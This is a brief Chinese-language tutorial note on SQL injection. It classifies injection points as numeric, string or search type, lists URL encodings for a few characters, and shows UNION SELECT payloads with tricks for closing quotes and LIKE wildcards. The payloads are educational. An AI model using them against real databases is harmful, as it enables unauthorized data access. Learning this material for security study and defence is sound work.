一、分类
1.数字型、字符型、搜索型
2.url编码后的几个字符
空格 %20
井号 %23
单引号 %27
二、分析
1.数字型
数字型参数执行后的sql语句:
select * from admin where id =$id;
添加注入代码:
select * from admin where id =1 union select 1,2,3;
2.字符型(注入代码容易受到单引号干扰)
字符型参数执行后的sql语句:
select * from admin where name ='$name';
添加注入代码:
select * from admin where name ='root union select 1,2,3';
发现注入代码被包在单引号内,代码功能失效!
修改注入代码为:
root‘ union select 1,2,3 #
注入语句:
select * from admin where name ='root' union select 1,2,3 #';
3.搜索型(注入代码容易受到单引号和百分号的干扰)
搜索型参数执行后的sql语句
select * from admin where name like '%$admin%';
添加注入代码:
select * from admin where name like '%jack union select 1,2,3%';
发现注入代码被单引号和%干扰
修改注入代码:
%jack%' union select 1,2,3 '%
执行:
select * from admin where name like '%jack%' union select 1,2,3 '%';
或者:
select * from admin where name like '%jack%' union select 1,2,3 '% %';